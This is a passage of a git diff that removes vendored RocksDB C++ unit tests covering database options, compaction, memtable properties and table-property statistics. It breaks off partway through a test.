-TEST_F(DBOptionsTest, SetOptionsMayTriggerCompaction) {
-  Options options;
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = 1000;
-  options.env = env_;
-  Reopen(options);
-  for (int i = 0; i < 3; i++) {
-    // Need to insert two keys to avoid trivial move.
-    ASSERT_OK(Put("foo", ToString(i)));
-    ASSERT_OK(Put("bar", ToString(i)));
-    Flush();
-  }
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_OK(
-      dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "3"}}));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel());
-}
-
-TEST_F(DBOptionsTest, SetBackgroundCompactionThreads) {
-  Options options;
-  options.create_if_missing = true;
-  options.max_background_compactions = 1;   // default value
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_background_compactions", "3"}}));
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  auto stop_token = dbfull()->TEST_write_controler().GetStopToken();
-  ASSERT_EQ(3, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-TEST_F(DBOptionsTest, SetBackgroundJobs) {
-  Options options;
-  options.create_if_missing = true;
-  options.max_background_jobs = 8;
-  options.env = env_;
-  Reopen(options);
-
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      options.max_background_jobs = 12;
-      ASSERT_OK(dbfull()->SetDBOptions(
-          {{"max_background_jobs",
-            std::to_string(options.max_background_jobs)}}));
-    }
-
-    ASSERT_EQ(options.max_background_jobs / 4,
-              dbfull()->TEST_BGFlushesAllowed());
-    ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-    auto stop_token = dbfull()->TEST_write_controler().GetStopToken();
-
-    ASSERT_EQ(options.max_background_jobs / 4,
-              dbfull()->TEST_BGFlushesAllowed());
-    ASSERT_EQ(3 * options.max_background_jobs / 4,
-              dbfull()->TEST_BGCompactionsAllowed());
-  }
-}
-
-TEST_F(DBOptionsTest, AvoidFlushDuringShutdown) {
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  WriteOptions write_without_wal;
-  write_without_wal.disableWAL = true;
-
-  ASSERT_FALSE(options.avoid_flush_during_shutdown);
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v1", write_without_wal));
-  Reopen(options);
-  ASSERT_EQ("v1", Get("foo"));
-  ASSERT_EQ("1", FilesPerLevel());
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v2", write_without_wal));
-  ASSERT_OK(dbfull()->SetDBOptions({{"avoid_flush_during_shutdown", "true"}}));
-  Reopen(options);
-  ASSERT_EQ("NOT_FOUND", Get("foo"));
-  ASSERT_EQ("", FilesPerLevel());
-}
-
-TEST_F(DBOptionsTest, SetDelayedWriteRateOption) {
-  Options options;
-  options.create_if_missing = true;
-  options.delayed_write_rate = 2 * 1024U * 1024U;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(2 * 1024U * 1024U, dbfull()->TEST_write_controler().max_delayed_write_rate());
-
-  ASSERT_OK(dbfull()->SetDBOptions({{"delayed_write_rate", "20000"}}));
-  ASSERT_EQ(20000, dbfull()->TEST_write_controler().max_delayed_write_rate());
-}
-
-TEST_F(DBOptionsTest, MaxTotalWalSizeChange) {
-  Random rnd(1044);
-  const auto value_size = size_t(1024);
-  std::string value;
-  test::RandomString(&rnd, value_size, &value);
-
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  CreateColumnFamilies({"1", "2", "3"}, options);
-  ReopenWithColumnFamilies({"default", "1", "2", "3"}, options);
-
-  WriteOptions write_options;
-
-  const int key_count = 100;
-  for (int i = 0; i < key_count; ++i) {
-    for (size_t cf = 0; cf < handles_.size(); ++cf) {
-      ASSERT_OK(Put(static_cast<int>(cf), Key(i), value));
-    }
-  }
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_total_wal_size", "10"}}));
-
-  for (size_t cf = 0; cf < handles_.size(); ++cf) {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-    ASSERT_EQ("1", FilesPerLevel(static_cast<int>(cf)));
-  }
-}
-
-TEST_F(DBOptionsTest, SetStatsDumpPeriodSec) {
-  Options options;
-  options.create_if_missing = true;
-  options.stats_dump_period_sec = 5;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(5, dbfull()->GetDBOptions().stats_dump_period_sec);
-
-  for (int i = 0; i < 20; i++) {
-    int num = rand() % 5000 + 1;
-    ASSERT_OK(dbfull()->SetDBOptions(
-        {{"stats_dump_period_sec", std::to_string(num)}}));
-    ASSERT_EQ(num, dbfull()->GetDBOptions().stats_dump_period_sec);
-  }
-}
-
-static void assert_candidate_files_empty(DBImpl* dbfull, const bool empty) {
-  dbfull->TEST_LockMutex();
-  JobContext job_context(0);
-  dbfull->FindObsoleteFiles(&job_context, false);
-  ASSERT_EQ(empty, job_context.full_scan_candidate_files.empty());
-  job_context.Clean();
-  dbfull->TEST_UnlockMutex();
-}
-
-TEST_F(DBOptionsTest, DeleteObsoleteFilesPeriodChange) {
-  SpecialEnv env(env_);
-  env.time_elapse_only_sleep_ = true;
-  Options options;
-  options.env = &env;
-  options.create_if_missing = true;
-  ASSERT_OK(TryReopen(options));
-
-  // Verify that candidate files set is empty when no full scan requested.
-  assert_candidate_files_empty(dbfull(), true);
-
-  ASSERT_OK(
-      dbfull()->SetDBOptions({{"delete_obsolete_files_period_micros", "0"}}));
-
-  // After delete_obsolete_files_period_micros updated to 0, the next call
-  // to FindObsoleteFiles should make a full scan
-  assert_candidate_files_empty(dbfull(), false);
-
-  ASSERT_OK(
-      dbfull()->SetDBOptions({{"delete_obsolete_files_period_micros", "20"}}));
-
-  assert_candidate_files_empty(dbfull(), true);
-
-  env.addon_time_.store(20);
-  assert_candidate_files_empty(dbfull(), true);
-
-  env.addon_time_.store(21);
-  assert_candidate_files_empty(dbfull(), false);
-
-  Close();
-}
-
-TEST_F(DBOptionsTest, MaxOpenFilesChange) {
-  SpecialEnv env(env_);
-  Options options;
-  options.env = CurrentOptions().env;
-  options.max_open_files = -1;
-
-  Reopen(options);
-
-  Cache* tc = dbfull()->TEST_table_cache();
-
-  ASSERT_EQ(-1, dbfull()->GetDBOptions().max_open_files);
-  ASSERT_LT(2000, tc->GetCapacity());
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_open_files", "1024"}}));
-  ASSERT_EQ(1024, dbfull()->GetDBOptions().max_open_files);
-  // examine the table cache (actual size should be 1014)
-  ASSERT_GT(1500, tc->GetCapacity());
-  Close();
-}
-
-TEST_F(DBOptionsTest, SanitizeDelayedWriteRate) {
-  Options options;
-  options.delayed_write_rate = 0;
-  Reopen(options);
-  ASSERT_EQ(16 * 1024 * 1024, dbfull()->GetDBOptions().delayed_write_rate);
-
-  options.rate_limiter.reset(NewGenericRateLimiter(31 * 1024 * 1024));
-  Reopen(options);
-  ASSERT_EQ(31 * 1024 * 1024, dbfull()->GetDBOptions().delayed_write_rate);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_properties_test.cc b/thirdparty/rocksdb/db/db_properties_test.cc
deleted file mode 100644
index 0da64b1..0000000
--- a/thirdparty/rocksdb/db/db_properties_test.cc
+++ /dev/null
@@ -1,1393 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#include <algorithm>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/perf_level.h"
-#include "rocksdb/table.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class DBPropertiesTest : public DBTestBase {
- public:
-  DBPropertiesTest() : DBTestBase("/db_properties_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, Empty) {
-  do {
-    Options options;
-    options.env = env_;
-    options.write_buffer_size = 100000;  // Small write buffer
-    options.allow_concurrent_memtable_write = false;
-    options = CurrentOptions(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    std::string num;
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("0", num);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("1", num);
-
-    // Block sync calls
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-    Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("2", num);
-
-    Put(1, "k2", std::string(100000, 'y'));  // Trigger compaction
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("1", num);
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    // Release sync calls
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("1", num);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("2", num);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("3", num);
-
-    ASSERT_OK(db_->EnableFileDeletions(false));
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("2", num);
-
-    ASSERT_OK(db_->EnableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("0", num);
-  } while (ChangeOptions());
-}
-
-TEST_F(DBPropertiesTest, CurrentVersionNumber) {
-  uint64_t v1, v2, v3;
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v1));
-  Put("12345678", "");
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v2));
-  Flush();
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v3));
-
-  ASSERT_EQ(v1, v2);
-  ASSERT_GT(v3, v2);
-}
-
-TEST_F(DBPropertiesTest, GetAggregatedIntPropertyTest) {
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  const int kKeyNum = 100;
-
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.write_buffer_size = (kKeySize + kValueSize) * kKeyNum / 10;
-  // Make them never flush
-  options.min_write_buffer_number_to_merge = 1000;
-  options.max_write_buffer_number = 1000;
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"one", "two", "three", "four"}, options);
-
-  Random rnd(301);
-  for (auto* handle : handles_) {
-    for (int i = 0; i < kKeyNum; ++i) {
-      db_->Put(WriteOptions(), handle, RandomString(&rnd, kKeySize),
-               RandomString(&rnd, kValueSize));
-    }
-  }
-
-  uint64_t manual_sum = 0;
-  uint64_t api_sum = 0;
-  uint64_t value = 0;
-  for (auto* handle : handles_) {
-    ASSERT_TRUE(
-        db_->GetIntProperty(handle, DB::Properties::kSizeAllMemTables, &value));
-    manual_sum += value;
-  }
-  ASSERT_TRUE(db_->GetAggregatedIntProperty(DB::Properties::kSizeAllMemTables,
-                                            &api_sum));
-  ASSERT_GT(manual_sum, 0);
-  ASSERT_EQ(manual_sum, api_sum);
-
-  ASSERT_FALSE(db_->GetAggregatedIntProperty(DB::Properties::kDBStats, &value));
-
-  uint64_t before_flush_trm;
-  uint64_t after_flush_trm;
-  for (auto* handle : handles_) {
-    ASSERT_TRUE(db_->GetAggregatedIntProperty(
-        DB::Properties::kEstimateTableReadersMem, &before_flush_trm));
-
-    // Issue flush and expect larger memory usage of table readers.
-    db_->Flush(FlushOptions(), handle);
-
-    ASSERT_TRUE(db_->GetAggregatedIntProperty(
-        DB::Properties::kEstimateTableReadersMem, &after_flush_trm));
-    ASSERT_GT(after_flush_trm, before_flush_trm);
-  }
-}
-
-namespace {
-void ResetTableProperties(TableProperties* tp) {
-  tp->data_size = 0;
-  tp->index_size = 0;
-  tp->filter_size = 0;
-  tp->raw_key_size = 0;
-  tp->raw_value_size = 0;
-  tp->num_data_blocks = 0;
-  tp->num_entries = 0;
-}
-
-void ParseTablePropertiesString(std::string tp_string, TableProperties* tp) {
-  double dummy_double;
-  std::replace(tp_string.begin(), tp_string.end(), ';', ' ');
-  std::replace(tp_string.begin(), tp_string.end(), '=', ' ');
-  ResetTableProperties(tp);
-
-  sscanf(tp_string.c_str(),
-         "# data blocks %" SCNu64 " # entries %" SCNu64 " raw key size %" SCNu64
-         " raw average key size %lf "
-         " raw value size %" SCNu64
-         " raw average value size %lf "
-         " data block size %" SCNu64 " index block size %" SCNu64
-         " filter block size %" SCNu64,
-         &tp->num_data_blocks, &tp->num_entries, &tp->raw_key_size,
-         &dummy_double, &tp->raw_value_size, &dummy_double, &tp->data_size,
-         &tp->index_size, &tp->filter_size);
-}
-
-void VerifySimilar(uint64_t a, uint64_t b, double bias) {
-  ASSERT_EQ(a == 0U, b == 0U);
-  if (a == 0) {
-    return;
-  }
-  double dbl_a = static_cast<double>(a);
-  double dbl_b = static_cast<double>(b);
-  if (dbl_a > dbl_b) {
-    ASSERT_LT(static_cast<double>(dbl_a - dbl_b) / (dbl_a + dbl_b), bias);
-  } else {
-    ASSERT_LT(static_cast<double>(dbl_b - dbl_a) / (dbl_a + dbl_b), bias);
-  }
-}
-
-void VerifyTableProperties(const TableProperties& base_tp,
-                           const TableProperties& new_tp,
-                           double filter_size_bias = 0.1,
-                           double index_size_bias = 0.1,
-                           double data_size_bias = 0.1,
-                           double num_data_blocks_bias = 0.05) {
-  VerifySimilar(base_tp.data_size, new_tp.data_size, data_size_bias);
-  VerifySimilar(base_tp.index_size, new_tp.index_size, index_size_bias);
-  VerifySimilar(base_tp.filter_size, new_tp.filter_size, filter_size_bias);
-  VerifySimilar(base_tp.num_data_blocks, new_tp.num_data_blocks,
-                num_data_blocks_bias);
-  ASSERT_EQ(base_tp.raw_key_size, new_tp.raw_key_size);
-  ASSERT_EQ(base_tp.raw_value_size, new_tp.raw_value_size);
-  ASSERT_EQ(base_tp.num_entries, new_tp.num_entries);
-}
-
-void GetExpectedTableProperties(TableProperties* expected_tp,
-                                const int kKeySize, const int kValueSize,
-                                const int kKeysPerTable, const int kTableCount,
-                                const int kBloomBitsPerKey,
-                                const size_t kBlockSize) {
-  const int kKeyCount = kTableCount * kKeysPerTable;
-  const int kAvgSuccessorSize = kKeySize / 5;
-  const int kEncodingSavePerKey = kKeySize / 4;
-  expected_tp->raw_key_size = kKeyCount * (kKeySize + 8);
-  expected_tp->raw_value_size = kKeyCount * kValueSize;
-  expected_tp->num_entries = kKeyCount;
-  expected_tp->num_data_blocks =
-      kTableCount *
-      (kKeysPerTable * (kKeySize - kEncodingSavePerKey + kValueSize)) /
-      kBlockSize;
-  expected_tp->data_size =
-      kTableCount * (kKeysPerTable * (kKeySize + 8 + kValueSize));
-  expected_tp->index_size =
-      expected_tp->num_data_blocks * (kAvgSuccessorSize + 8);
-  expected_tp->filter_size =
-      kTableCount * (kKeysPerTable * kBloomBitsPerKey / 8);
-}
-}  // anonymous namespace
-
-TEST_F(DBPropertiesTest, ValidatePropertyInfo) {
-  for (const auto& ppt_name_and_info : InternalStats::ppt_name_to_info) {
-    // If C++ gets a std::string_literal, this would be better to check at
-    // compile-time using static_assert.
-    ASSERT_TRUE(ppt_name_and_info.first.empty() ||
-                !isdigit(ppt_name_and_info.first.back()));
-
-    ASSERT_TRUE((ppt_name_and_info.second.handle_string == nullptr) !=
-                (ppt_name_and_info.second.handle_int == nullptr));
-  }
-}
-
-TEST_F(DBPropertiesTest, ValidateSampleNumber) {
-  // When "max_open_files" is -1, we read all the files for
-  // "rocksdb.estimate-num-keys" computation, which is the ground truth.
-  // Otherwise, we sample 20 newest files to make an estimation.
-  // Formula: lastest_20_files_active_key_ratio * total_files
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_stop_writes_trigger = 1000;
-  DestroyAndReopen(options);
-  int key = 0;
-  for (int files = 20; files >= 10; files -= 10) {
-    for (int i = 0; i < files; i++) {
-      int rows = files / 10;
-      for (int j = 0; j < rows; j++) {
-        db_->Put(WriteOptions(), std::to_string(++key), "foo");
-      }
-      db_->Flush(FlushOptions());
-    }
-  }
-  std::string num;
-  Reopen(options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ("45", num);
-  options.max_open_files = -1;
-  Reopen(options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ("50", num);
-}
-
-TEST_F(DBPropertiesTest, AggregatedTableProperties) {
-  for (int kTableCount = 40; kTableCount <= 100; kTableCount += 30) {
-    const int kKeysPerTable = 100;
-    const int kKeySize = 80;
-    const int kValueSize = 200;
-    const int kBloomBitsPerKey = 20;
-
-    Options options = CurrentOptions();
-    options.level0_file_num_compaction_trigger = 8;
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-
-    BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(
-        NewBloomFilterPolicy(kBloomBitsPerKey, false));
-    table_options.block_size = 1024;
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-    DestroyAndReopen(options);
-
-    Random rnd(5632);
-    for (int table = 1; table <= kTableCount; ++table) {
-      for (int i = 0; i < kKeysPerTable; ++i) {
-        db_->Put(WriteOptions(), RandomString(&rnd, kKeySize),
-                 RandomString(&rnd, kValueSize));
-      }
-      db_->Flush(FlushOptions());
-    }
-    std::string property;
-    db_->GetProperty(DB::Properties::kAggregatedTableProperties, &property);
-
-    TableProperties expected_tp;
-    GetExpectedTableProperties(&expected_tp, kKeySize, kValueSize,
-                               kKeysPerTable, kTableCount, kBloomBitsPerKey,
-                               table_options.block_size);
-
-    TableProperties output_tp;
-    ParseTablePropertiesString(property, &output_tp);
-
-    VerifyTableProperties(expected_tp, output_tp);
-  }
-}
-
-TEST_F(DBPropertiesTest, ReadLatencyHistogramByLevel) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;
-  options.level0_file_num_compaction_trigger = 6;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 4500 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_write_buffer_number = 2;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_open_files = 100;
-
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  int key_index = 0;
-  Random rnd(301);
-  for (int num = 0; num < 8; num++) {
-    Put("foo", "bar");
-    GenerateNewFile(&rnd, &key_index);
-    dbfull()->TEST_WaitForCompact();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  std::string prop;
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.dbstats", &prop));
-
-  // Get() after flushes, See latency histogram tracked.
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Reopen and issue Get(). See thee latency tracked
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  dbfull()->TEST_WaitForCompact();
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty(dbfull()->DefaultColumnFamily(),
-                                    "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Reopen and issue iterating. See thee latency tracked
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cf-file-histogram", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  {
-    unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    for (iter->Seek(Key(0)); iter->Valid(); iter->Next()) {
-    }
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // CF 1 should show no histogram.
-  ASSERT_TRUE(
-      dbfull()->GetProperty(handles_[1], "rocksdb.cf-file-histogram", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  // put something and read it back , CF 1 should show histogram.
-  Put(1, "foo", "bar");
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  ASSERT_TRUE(
-      dbfull()->GetProperty(handles_[1], "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // options.max_open_files preloads table readers.
-  options.max_open_files = -1;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(dbfull()->GetProperty(dbfull()->DefaultColumnFamily(),
-                                    "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Clear internal stats
-  dbfull()->ResetStats();
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-}
-
-TEST_F(DBPropertiesTest, AggregatedTablePropertiesAtLevel) {
-  const int kTableCount = 100;
-  const int kKeysPerTable = 10;
-  const int kKeySize = 50;
-  const int kValueSize = 400;
-  const int kMaxLevel = 7;
-  const int kBloomBitsPerKey = 20;
-  Random rnd(301);
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 8;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 8192;
-  options.max_bytes_for_level_base = 10000;
-  options.max_bytes_for_level_multiplier = 2;
-  // This ensures there no compaction happening when we call GetProperty().
-  options.disable_auto_compactions = true;
-
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(
-      NewBloomFilterPolicy(kBloomBitsPerKey, false));
-  table_options.block_size = 1024;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-
-  std::string level_tp_strings[kMaxLevel];
-  std::string tp_string;
-  TableProperties level_tps[kMaxLevel];
-  TableProperties tp, sum_tp, expected_tp;
-  for (int table = 1; table <= kTableCount; ++table) {
-    for (int i = 0; i < kKeysPerTable; ++i) {
-      db_->Put(WriteOptions(), RandomString(&rnd, kKeySize),
-               RandomString(&rnd, kValueSize));
-    }
-    db_->Flush(FlushOptions());
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ResetTableProperties(&sum_tp);
-    for (int level = 0; level < kMaxLevel; ++level) {
-      db_->GetProperty(
-          DB::Properties::kAggregatedTablePropertiesAtLevel + ToString(level),
-          &level_tp_strings[level]);
-      ParseTablePropertiesString(level_tp_strings[level], &level_tps[level]);
-      sum_tp.data_size += level_tps[level].data_size;
-      sum_tp.index_size += level_tps[level].index_size;
-      sum_tp.filter_size += level_tps[level].filter_size;
-      sum_tp.raw_key_size += level_tps[level].raw_key_size;
-      sum_tp.raw_value_size += level_tps[level].raw_value_size;
-      sum_tp.num_data_blocks += level_tps[level].num_data_blocks;
-      sum_tp.num_entries += level_tps[level].num_entries;
-    }
-    db_->GetProperty(DB::Properties::kAggregatedTableProperties, &tp_string);
-    ParseTablePropertiesString(tp_string, &tp);
-    ASSERT_EQ(sum_tp.data_size, tp.data_size);
-    ASSERT_EQ(sum_tp.index_size, tp.index_size);
-    ASSERT_EQ(sum_tp.filter_size, tp.filter_size);
-    ASSERT_EQ(sum_tp.raw_key_size, tp.raw_key_size);
-    ASSERT_EQ(sum_tp.raw_value_size, tp.raw_value_size);
-    ASSERT_EQ(sum_tp.num_data_blocks, tp.num_data_blocks);
-    ASSERT_EQ(sum_tp.num_entries, tp.num_entries);
-    if (table > 3) {
-      GetExpectedTableProperties(&expected_tp, kKeySize, kValueSize,
-                                 kKeysPerTable, table, kBloomBitsPerKey,
-                                 table_options.block_size);
-      // Gives larger bias here as index block size, filter block size,
-      // and data block size become much harder to estimate in this test.
-      VerifyTableProperties(tp, expected_tp, 0.5, 0.4, 0.4, 0.25);
-    }
-  }
-}
-
-TEST_F(DBPropertiesTest, NumImmutableMemTable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = 4;
-    options.write_buffer_size = 1000000;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    std::string big_value(1000000 * 2, 'x');
-    std::string num;
-    uint64_t value;
-    SetPerfLevel(kEnableTime);
-    ASSERT_TRUE(GetPerfLevel() == kEnableTime);
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k1", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], DB::Properties::kNumImmutableMemTableFlushed, &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &num));
-    ASSERT_EQ(num, "1");
-
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(2, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k2");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k3", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.cur-size-active-mem-table", &num));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "2");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
